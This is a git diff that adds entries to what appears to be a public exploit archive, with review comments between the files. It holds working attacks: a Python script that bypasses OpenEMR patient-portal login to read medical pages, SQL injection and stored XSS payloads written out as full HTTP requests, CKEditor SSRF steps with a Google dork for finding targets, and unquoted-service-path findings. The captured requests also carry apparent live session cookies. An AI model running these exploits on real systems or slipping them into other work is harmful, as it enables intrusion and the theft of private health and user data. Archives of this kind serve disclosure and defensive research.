diff --git a/exploits/php/webapps/50016.txt b/exploits/php/webapps/50016.txt
new file mode 100644
index 000000000..07787ec95
--- /dev/null
+++ b/exploits/php/webapps/50016.txt
@@ -0,0 +1,77 @@
+# Exploit Title: Cotonti Siena 0.9.19 - 'maintitle' Stored Cross-Site Scripting
+# Date: 2021-15-06
+# Exploit Author: Fatih İLGİN
+# Vendor Homepage: cotonti.com
+# Vulnerable Software: https://www.cotonti.com/download/siena_0919
+# Affected Version: 0.9.19
+# Tested on: Windows 10
+
+# Vulnerable Parameter Type: POST
+# Vulnerable Parameter: maintitle
+# Attack Pattern: ">
+
+# Description
+
+1) Entering the Admin Panel (vulnerableapplication.com/cotonti/admin.php)
+2) Then go to Configuration tab and set payload (">
) for Site title param
+3) Then click Update button
+4) In the end, Go to home page then shown triggered vulnerability
+
+
+# Proof of Concepts
+
+Request;
+
+POST /cotonti/admin.php?m=config&n=edit&o=core&p=title&a=update HTTP/1.1
+Host: vulnerableapplication.com
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101
+Firefox/78.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 440
+Origin: https://vulnerableapplication.com
+Connection: close
+Referer:
+https://vulnerableapplication/cotonti/admin.php?m=config&n=edit&o=core&p=title
+Cookie:
+__cmpconsentx19318=CPH17mBPH17mBAfUmBENBeCsAP_AAH_AAAYgG9tf_X_fb3_j-_59__t0eY1f9_7_v-0zjheds-8Nyd_X_L8X_2M7vB36pr4KuR4ku3bBAQdtHOncTQmx6IlVqTPsb02Mr7NKJ7PEmlsbe2dYGH9_n9XT_ZKZ79_____7________77______3_v__9-BvbX_1_329_4_v-ff_7dHmNX_f-_7_tM44XnbPvDcnf1_y_F_9jO7wd-qa-CrkeJLt2wQEHbRzp3E0JseiJVakz7G9NjK-zSiezxJpbG3tnWBh_f5_V0_2Sme_f____-________--______9_7___fgAAA;
+__cmpcccx19318=aBPH17mCgAADAAXAA0AB4AQ4DiQKnAAA;
+_ga=GA1.2.1498194981.1623770561; _gid=GA1.2.1196246770.1623770561;
+__gads=ID=63f33aa9dd32c83c-220723d35ec800e9:T=1623770613:RT=1623770613:S=ALNI_MZ0ifDGVpIXuopc8JXvo208SRTYmA;
+PHPSESSID=ahmanvhckp2o5g5rnpr4cnj9c3
+
+&x=701dad27076b1d78&maintitle=%22%3E%3Cimg+src%3D1+href%3D1+onerror%3D%22javascript%3Aalert(1)%22%3E%3C%2Fimg%3E&subtitle=Subtitle&metakeywords=&title_users_details=%7BUSER%7D%3A+%7BNAME%7D&title_header=%7BSUBTITLE%7D+-+%7BMAINTITLE%7D&title_header_index=%7BMAINTITLE%7D+-+%7BDESCRIPTION%7D&subject_mail=%7BSITE_TITLE%7D+-+%7BMAIL_SUBJECT%7D&body_mail=%7BMAIL_BODY%7D%0D%0A%0D%0A%7BSITE_TITLE%7D+-+%7BSITE_URL%7D%0D%0A%7BSITE_DESCRIPTION%7D
+
+
+Response;
+
+HTTP/1.1 200 OK
+Date: Tue, 15 Jun 2021 16:07:59 GMT
+Server: Apache
+Expires: Mon, Apr 01 1974 00:00:00 GMT
+Cache-Control: no-store,no-cache,must-revalidate, post-check=0,pre-check=0
+Pragma: no-cache
+Last-Modified: Tue, 15 Jun 2021 04:07:59 GMT
+Vary: Accept-Encoding
+X-Robots-Tag: noindex,nofollow
+Content-Length: 4366
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+
+
Configuration
+
\ No newline at end of file
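Review bot: The captured request under "Proof of Concepts" still carries what look like the tester's own session values (the `PHPSESSID` cookie, the consent and analytics cookies, and the `x=` form token), and these should be replaced with placeholders such as `PHPSESSID=<redacted>` before the file is archived. The same applies to the `PHPSESSID` values in 50018.txt and 50019.txt. The header date `2021-15-06` is not a valid year-month-day value; `2021-06-15` would match the `Date:` header of the captured response. The write-up also has no remediation line; `# Mitigation: HTML-encode the site title (maintitle) wherever it is rendered` would help defenders, assuming the value is echoed unescaped as the steps imply.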
diff --git a/exploits/php/webapps/50017.py b/exploits/php/webapps/50017.py
new file mode 100755
index 000000000..7c7a92456
--- /dev/null
+++ b/exploits/php/webapps/50017.py
@@ -0,0 +1,88 @@
+# Exploit Title: OpenEMR 5.0.1.3 - '/portal/account/register.php' Authentication Bypass
+# Date 15.06.2021
+# Exploit Author: Ron Jost (Hacker5preme)
+# Vendor Homepage: https://www.open-emr.org/
+# Software Link: https://github.com/openemr/openemr/archive/refs/tags/v5_0_1_3.zip
+# Version: All versions prior to 5.0.1.4
+# Tested on: Ubuntu 18.04
+# CVE: CVE-2018-15152
+# CWE: CWE-287
+# Documentation: https://github.com/Hacker5preme/Exploits#CVE-2018-15152-Exploit
+
+'''
+Description:
+An unauthenticated user is able to bypass the Patient Portal Login by simply navigating to
+the registration page and modifying the requested url to access the desired page. Some
+examples of pages in the portal directory that are accessible after browsing to the
+registration page include:
+- add_edit_event_user.php
+- find_appt_popup_user.php
+- get_allergies.php
+- get_amendments.php
+- get_lab_results.php
+- get_medications.php
+- get_patient_documents.php
+- get_problems.php
+- get_profile.php
+- portal_payment.php
+- messaging/messages.php
+- messaging/secure_chat.php
+- report/pat_ledger.php
+- report/portal_custom_report.php
+- report/portal_patient_report.php
+Normally, access to these pages requires authentication as a patient. If a user were to visit
+any of those pages unauthenticated, they would be redirected to the login page.
+'''
+
+
+'''
+Import required modules:
+'''
+import requests
+import argparse
+
+
+'''
+User-Input:
+'''
+my_parser = argparse.ArgumentParser(description='OpenEMR Authentication bypass')
+my_parser.add_argument('-T', '--IP', type=str)
+my_parser.add_argument('-P', '--PORT', type=str)
+my_parser.add_argument('-U', '--Openemrpath', type=str)
+my_parser.add_argument('-R', '--PathToGet', type=str)
+args = my_parser.parse_args()
+target_ip = args.IP
+target_port = args.PORT
+openemr_path = args.Openemrpath
+pathtoread = args.PathToGet
+
+
+'''
+Check for vulnerability:
+'''
+# Check, if Registration portal is enabled. If it is not, this exploit can not work
+session = requests.Session()
+check_vuln_url = 'http://' + target_ip + ':' + target_port + openemr_path + '/portal/account/register.php'
+check_vuln = session.get(check_vuln_url).text
+print('')
+print('[*] Checking vulnerability: ')
+print('')
+
+if "Enter email address to receive registration." in check_vuln:
+ print('[+] Host Vulnerable. Proceeding exploit')
+else:
+ print('[-] Host is not Vulnerable: Registration for patients is not enabled')
+
+'''
+Exploit:
+'''
+header = {
+ 'Referer': check_vuln_url
+}
+exploit_url = 'http://' + target_ip + ':' + target_port + openemr_path + pathtoread
+Exploit = session.get(exploit_url, headers=header)
+print('')
+print('[+] Results: ')
+print('')
+print(Exploit.text)
+print('')
\ No newline at end of file
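Review bot: The `else:` branch of the vulnerability check only prints "Host is not Vulnerable" and then falls through to the request section, so the second GET is sent even when the registration page was not detected; ending that branch with `raise SystemExit(1)` would stop the script there. None of the four `add_argument` calls sets `required=True`, so a missing option reaches the string concatenation as `None` and fails with a `TypeError` instead of a usage message. For defenders, the header says versions prior to 5.0.1.4 are affected, and a line such as `# Mitigation: upgrade to OpenEMR 5.0.1.4 or later, or disable patient self-registration in the portal` would make that actionable; the second option follows from the script's own check that registration must be enabled. In access logs, the pattern to look for is a request for one of the listed portal pages carrying a `Referer` of `/portal/account/register.php` without a patient login.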
diff --git a/exploits/php/webapps/50018.txt b/exploits/php/webapps/50018.txt
new file mode 100644
index 000000000..f35120bfa
--- /dev/null
+++ b/exploits/php/webapps/50018.txt
@@ -0,0 +1,38 @@
+# Exploit Title: Teachers Record Management System 1.0 – Multiple SQL Injection (Authenticated)
+# Date: 05-10-2021
+# Exploit Author: nhattruong
+# Vendor Homepage: https://phpgurukul.com
+# Software Link: https://phpgurukul.com/teachers-record-management-system-using-php-and-mysql/
+# Version: 1.0
+# Tested on: Windows 10 + XAMPP v3.2.4
+
+POC:
+1. Go to url http://localhost/login.php
+2. Login with default creds
+3. Execute the payload
+
+Payload #1:
+
+POST /admin/search.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 32
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/trms/admin/search.php
+Cookie: PHPSESSID=4c4g8dedr7omt9kp1j7d6v6fg0
+Upgrade-Insecure-Requests: 1
+
+searchdata=a' or 1=1-- -&search=
+
+Payload #2:
+
+http://local/admin/edit-subjects-detail.php?editid=a' or 1=1-- -
+
+Payload #3:
+
+http://local/admin/edit-teacher-detail.php?editid=a' or 1=1-- -
\ No newline at end of file
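Review bot: The three payload targets are inconsistent: the POST line uses `/admin/search.php` while its `Referer` uses `/trms/admin/search.php`, and payloads #2 and #3 use host `local` where the steps use `localhost`, so a reader cannot tell which base path was actually tested. Step 2 relies on "default creds" with no remark that an unchanged default admin password is itself a finding; a note that it must be changed on install belongs next to that step. No remediation is given; `# Mitigation: bind searchdata and editid as parameters in prepared statements instead of concatenating them into the query` would cover all three payloads, assuming (the PHP source is not shown) that the values are concatenated into SQL.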
diff --git a/exploits/php/webapps/50019.txt b/exploits/php/webapps/50019.txt
new file mode 100644
index 000000000..f72729726
--- /dev/null
+++ b/exploits/php/webapps/50019.txt
@@ -0,0 +1,31 @@
+# Exploit Title: Teachers Record Management System 1.0 – 'email' Stored Cross-site Scripting (XSS)
+# Date: 05-10-2021
+# Exploit Author: nhattruong
+# Vendor Homepage: https://phpgurukul.com
+# Software Link: https://phpgurukul.com/teachers-record-management-system-using-php-and-mysql/
+# Version: 1.0
+# Tested on: Windows 10 + XAMPP v3.2.4
+
+POC:
+1. Go to url http://localhost/admin/index.php
+2. Do login
+3. Execute the payload
+4. Reload page to see the different
+
+Payload:
+
+POST /admin/adminprofile.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 91
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/trms/admin/adminprofile.php
+Cookie: PHPSESSID=8vkht2tvbo774tsjke1t739i7l
+Upgrade-Insecure-Requests: 1
+
+adminname=Adminm&username=admin&mobilenumber=8979555556&email=">&submit=
\ No newline at end of file
diff --git a/exploits/php/webapps/50021.txt b/exploits/php/webapps/50021.txt
new file mode 100644
index 000000000..f9298c2fa
--- /dev/null
+++ b/exploits/php/webapps/50021.txt
@@ -0,0 +1,53 @@
+# Exploit Title: CKEditor 3 - Server-Side Request Forgery (SSRF)
+# Google Dorks : inurl /editor/filemanager/connectors/uploadtest.html
+# Date: 12-6-2021
+# Exploit Author: Blackangel
+# Software Link: https://ckeditor.com/
+# Version:all version under 4 (1,2,3)
+# Tested on: windows 7
+
+Steps of Exploit:-
+
+1-using google dorks
+
+inurl /editor/filemanager/connectors/uploadtest.html
+
+2-after going to vulnerable page you will find filed “Custom Uploader URL: ”
+
+3-right click then choose inspect element, click on pick an element from
+the page , select field Custom Uploader URL:
+
+4-in elements “
”
+
+delete disabled=””
+
+5-now you can put url start with any protocal
+
+6-send it to the server as you see website that you have entered link
+
+is appear into page .
+
+what this mean??!!1
+
+you send request to server using vulnerable website
+
+you can said i used it as proxy
+
+hackers >>> vulnerable website >>> http:/xx.com
+
+so in http://xx.com logs requests come from vulnerable website
+
+impact:-
+
+1-that allows an attacker to induce the server-side application to make
+HTTP requests to an arbitrary domain of the attacker’s choosing. if there
+is big company use old version hackers can send request via there websites
+and this not good for reputation of company
+
+2-put big company website in blacklist of websites cause i hackers can send
+many of request via vulnerable website
+
+Mitigation:-
+
+Remove the uploadtest.html file as it is not used by the application.
\ No newline at end of file
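Review bot: The steps never show evidence that the request is issued by the server: removing `disabled` from the "Custom Uploader URL" field and submitting the form may simply make the browser post to the entered URL, which would not be server-side request forgery, and the claim that the destination's logs show the vulnerable site needs a log excerpt to support it. The title says "CKEditor 3" while the version line says "all version under 4 (1,2,3)", and the `/editor/filemanager/connectors/uploadtest.html` path looks like the layout of the older FCKeditor 2.x file manager, so the affected product should be confirmed. The mitigation line is sound and could be broadened to `Mitigation: remove uploadtest.html and any other sample or test pages shipped with the editor from production deployments`.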
diff --git a/exploits/windows/local/50012.txt b/exploits/windows/local/50012.txt
new file mode 100644
index 000000000..ab312e198
--- /dev/null
+++ b/exploits/windows/local/50012.txt
@@ -0,0 +1,50 @@
+# Exploit Title: DiskPulse 13.6.14 - 'Multiple' Unquoted Service Path
+# Discovery by: Brian Rodriguez
+# Date: 14-06-2021
+# Vendor Homepage: https://www.diskpulse.com
+# Software Links:
+# https://www.diskpulse.com/setups_x64/diskpulseent_setup_v13.6.14_x64.exe
+# https://www.diskpulse.com/setups_x64/diskpulsesrv_setup_v13.6.14_x64.exe
+# Tested Version: 13.6.14
+# Vulnerability Type: Unquoted Service Path
+# Tested on: Windows 10 Enterprise 64 bits
+
+# Step to discover Unquoted Service Path:
+
+C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"
+|findstr /i /v "c:\windows\\" |findstr /i /v """
+
+Disk Pulse Enterprise Disk Pulse Enterprise C:\Program Files\Disk Pulse
+Enterprise\bin\diskpls.exe Auto
+Disk Pulse Server Disk Pulse Server C:\Program Files\Disk Pulse
+Server\bin\diskpls.exe Auto
+
+C:\Users\IEUser>sc qc "Disk Pulse Enterprise"
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: Disk Pulse Enterprise
+ TIPO : 10 WIN32_OWN_PROCESS
+ TIPO_INICIO : 2 AUTO_START
+ CONTROL_ERROR : 0 IGNORE
+ NOMBRE_RUTA_BINARIO: C:\Program Files\Disk Pulse
+Enterprise\bin\diskpls.exe
+ GRUPO_ORDEN_CARGA :
+ ETIQUETA : 0
+ NOMBRE_MOSTRAR : Disk Pulse Enterprise
+ DEPENDENCIAS :
+ NOMBRE_INICIO_SERVICIO: LocalSystem
+
+C:\Users\IEUser>sc qc "Disk Pulse Server"
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: Disk Pulse Server
+ TIPO : 10 WIN32_OWN_PROCESS
+ TIPO_INICIO : 2 AUTO_START
+ CONTROL_ERROR : 0 IGNORE
+ NOMBRE_RUTA_BINARIO: C:\Program Files\Disk Pulse
+Server\bin\diskpls.exe
+ GRUPO_ORDEN_CARGA :
+ ETIQUETA : 0
+ NOMBRE_MOSTRAR : Disk Pulse Server
+ DEPENDENCIAS :
+ NOMBRE_INICIO_SERVICIO: LocalSystem
\ No newline at end of file
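Review bot: The write-up stops at discovery and does not show that the unquoted path is reachable by a low-privileged user: both `NOMBRE_RUTA_BINARIO` values sit under `C:\Program Files`, which standard users cannot normally write to, so `icacls` output for `C:\` and `C:\Program Files` on the test machine is needed to support the finding. A remediation line is also missing; `# Mitigation: enclose the service binary path in double quotes in the service configuration (ImagePath)` would do. Both points apply equally to 50013.txt (Disk Sorter Server).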
diff --git a/exploits/windows/local/50013.txt b/exploits/windows/local/50013.txt
new file mode 100644
index 000000000..34921c8ed
--- /dev/null
+++ b/exploits/windows/local/50013.txt
@@ -0,0 +1,31 @@
+ # Exploit Title: Disk Sorter Server 13.6.12 - 'Disk Sorter Server' Unquoted Service Path
+# Discovery by: BRushiran
+# Date: 15-06-2021
+# Vendor Homepage: https://www.disksorter.com
+# Software Links: https://www.disksorter.com/setups_x64/disksortersrv_setup_v13.6.12_x64.exe
+# Tested Version: 13.6.12
+# Vulnerability Type: Unquoted Service Path
+# Tested on: Windows 10 Enterprise 64 bits
+
+# Step to discover Unquoted Service Path:
+
+C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"
+|findstr /i /v "c:\windows\\" |findstr /i /v """
+
+Disk Sorter Server Disk Sorter Server C:\Program Files\Disk Sorter
+Server\bin\disksrs.exe Auto
+
+C:\>sc qc "Disk Sorter Server"
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: Disk Sorter Server
+ TIPO : 10 WIN32_OWN_PROCESS
+ TIPO_INICIO : 2 AUTO_START
+ CONTROL_ERROR : 0 IGNORE
+ NOMBRE_RUTA_BINARIO: C:\Program Files\Disk Sorter
+Server\bin\disksrs.exe
+ GRUPO_ORDEN_CARGA :
+ ETIQUETA : 0
+ NOMBRE_MOSTRAR : Disk Sorter Server
+ DEPENDENCIAS :
+ NOMBRE_INICIO_SERVICIO: LocalSystem
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 5574d20ec..11e0e5685 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -11368,6 +11368,8 @@ id,file,description,date,author,type,platform,port
50009,exploits/windows/local/50009.txt,"SysGauge 7.9.18 - ' SysGauge Server' Unquoted Service Path",2021-06-15,"Brian Rodriguez",local,windows,
50010,exploits/windows/local/50010.txt,"Brother BRAgent 1.38 - 'WBA_Agent_Client' Unquoted Service Path",2021-06-15,"Brian Rodriguez",local,windows,
50011,exploits/linux/local/50011.sh,"Polkit 0.105-26 0.117-2 - Local Privilege Escalation",2021-06-15,"J Smith",local,linux,
+50012,exploits/windows/local/50012.txt,"DiskPulse 13.6.14 - 'Multiple' Unquoted Service Path",2021-06-16,"Brian Rodriguez",local,windows,
+50013,exploits/windows/local/50013.txt,"Disk Sorter Server 13.6.12 - 'Disk Sorter Server' Unquoted Service Path",2021-06-16,BRushiran,local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -44165,3 +44167,8 @@ id,file,description,date,author,type,platform,port
49998,exploits/php/webapps/49998.py,"OpenEMR 5.0.1.3 - 'manage_site_files' Remote Code Execution (Authenticated)",2021-06-14,"Ron Jost",webapps,php,
50007,exploits/php/webapps/50007.txt,"Client Management System 1.1 - 'username' Stored Cross-Site Scripting (XSS)",2021-06-15,"BHAVESH KAUL",webapps,php,
50008,exploits/tru64/webapps/50008.txt,"Client Management System 1.1 - 'Search' SQL Injection",2021-06-15,"BHAVESH KAUL",webapps,tru64,
+50016,exploits/php/webapps/50016.txt,"Cotonti Siena 0.9.19 - 'maintitle' Stored Cross-Site Scripting",2021-06-16,"Fatih İLGİN",webapps,php,
+50017,exploits/php/webapps/50017.py,"OpenEMR 5.0.1.3 - '/portal/account/register.php' Authentication Bypass",2021-06-16,"Ron Jost",webapps,php,
+50018,exploits/php/webapps/50018.txt,"Teachers Record Management System 1.0 - 'Multiple' SQL Injection (Authenticated)",2021-06-16,nhattruong,webapps,php,
+50019,exploits/php/webapps/50019.txt,"Teachers Record Management System 1.0 - 'email' Stored Cross-site Scripting (XSS)",2021-06-16,nhattruong,webapps,php,
+50021,exploits/php/webapps/50021.txt,"CKEditor 3 - Server-Side Request Forgery (SSRF)",2021-06-16,ahmed,webapps,php,
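Review bot: The index row for 50021 gives the author as `ahmed`, but the header of exploits/php/webapps/50021.txt names `Blackangel`; one of the two should be corrected so that the index and the file agree. The 50018 row's description (`'Multiple' SQL Injection`) also differs from the file's title line, which has no quotes around Multiple and uses an en dash. Every new row is dated 2021-06-16 while the files carry their own dates (for example `14-06-2021` in 50012.txt); if the column means publication date that is fine, but it is worth stating where the CSV columns are documented.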